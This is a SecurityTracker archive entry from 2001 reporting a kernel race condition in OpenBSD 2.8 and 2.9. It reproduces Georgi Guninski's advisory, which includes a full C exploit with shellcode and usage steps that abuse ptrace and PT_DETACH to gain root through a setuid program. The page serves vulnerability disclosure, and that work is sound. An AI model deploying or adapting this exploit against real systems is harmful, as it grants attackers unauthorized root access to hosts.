Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
OpenBSD Kernel Race Condition Lets Local Users Gain Root Level Privileges
|
|
SecurityTracker Alert ID: 1001753 |
|
SecurityTracker URL: http://securitytracker.com/id/1001753
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jun 14 2001
|
Impact:
Execution of arbitrary code via local system, Root access via local system
|
Exploit Included: Yes
|
Version(s): OpenBSD 2.9,2.8
|
Description:
Georgi Guninski reported a vulnerability in OpenBSD that lets local users obtain root level access on the host by exploiting a race condition that apparently exists in the kernel.
The vulnerability allows a user to attach to a process id (of /usr/bin/su, for example) using the ptrace function and then cause arbitrary code to be executed with the privileges of the original process (root, for example) before the process is killed.
It is reported that PT_DETACH allows specifying an address to which execution is continued (this is contrary to what is listed in the ptrace man page).
A demonstration exploit is included in the Source Message.
The vendor has reportedly been notified.
|
Impact:
A local user can obtain root level privileges on the host.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.openbsd.org/ (Links to External Site)
|
Cause:
State error
|
Underlying OS:
UNIX (OpenBSD)
|
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Thu, 14 Jun 2001 17:14:46 +0300
Subject: OpenBSD 2.9,2.8 local root compromise
|
Georgi Guninski security advisory #47, 2001
OpenBSD 2.9,2.8 local root compromise
Systems affected:
OpenBSD 2.9,2.8
Have not tested on other OSes but they may be vulnerable
Risk: High
Date: 14 June 2001
Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission.
Disclaimer:
The information in this advisory is believed to be true based on
experiments though it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.
Description:
There is local root compromise in OpenBSD 2.9, 2.8 due to a race
probably in the kernel. This is quite similar to the linux kernel
race several months ago.
Details:
By forking a few process it is possible to attach to +s pid with ptrace.
The process seems to be in a strange state when it is attached.
Contrary to the man info PT_DETACH allows specifying an address to which
execution is continued.
Exploit:
http://www.guninski.com/vvopenbsd.c
-------------vvopenbsd.c----------------------
/* Written by Georgi Guninski http://www.guninski.com
Tested on OpenBSD 2.9 and 2.8
Works best after reboot - the +s program must not be executed before, seems
executes /tmp/sh
/tmp/su must be a link to +s program
if the +s program has been executed, create and run shell script the size of RAM
You may need to type "fg" if the program receives stop signal
you may need to run the program several times
*/
#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <signal.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <limits.h>
#include <errno.h>
#include <stdlib.h>
#include <machine/reg.h>
int me=0;
void endit(int x)
{
if(!me)
{
printf("exiting\n");
exit(0);
}
}
extern char **environ;
int main(int ac, char **av)
{
volatile struct reg pt;
//exec "/tmp/sh"
char bsdshell[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80\x90\x90\x90";
int j,status,sig;
volatile int done=0;
volatile static int done2=0;
int pid,pid2,i;
int num; // number of processes to fork. 20 works for me on Pentium500
int target;
char *env1;
// address of $joro where execution of shell code begins.may need to be changed
unsigned int breakat=0xdfbfddaf;
num=20;
pid=getpid();
if(!getenv("joro"))
{
setenv("joro",bsdshell,1);
if (execle(av[0],"a",NULL,environ))
perror("exec");
}
else
breakat=(int)getenv("joro");
printf("Written by Georgi Guninski\nShall jump to %x\n",breakat);
target=pid;
printf("Started pid1=%d target=%d\n",pid,target);
for(i=0;i<num;i++)
{
if (!done)
if(! (pid2 = fork()))
{
signal(SIGURG,&endit);
pid2=getpid();
while(!done)
{
if (!ptrace(PT_ATTACH, target,NULL,NULL))
{
done=1;
printf("\nAttached!\n");
wait(&status);
sig=WSTOPSIG(status);
printf("sig=%d %s\n",status,sys_siglist[sig]);
ptrace(PT_GETREGS,target,(caddr_t)&pt,NULL);
printf("eip=%x esp=%x\n",pt.r_eip,pt.r_esp);
me=1;
done2 +=1;
ptrace(PT_DETACH, target,(caddr_t)breakat,NULL);
//sleep(2);
kill(0,SIGURG);
sleep(4);
while(42)
kill(target,SIGCONT);
}
}
}
}
// "/tmp/su" must be symbolic link to +s program .
// the program must not be executed before.
execle("/tmp/su","/usr/bin/su",NULL,environ);
}
----------------------------------------------
Workaround:
Don't know
Vendor status:
OpenBSD was informed on 9 June 2001.
Regards,
Georgi Guninski
http://www.guninski.com
|
|
Go to the Top of This SecurityTracker Archive Page
|
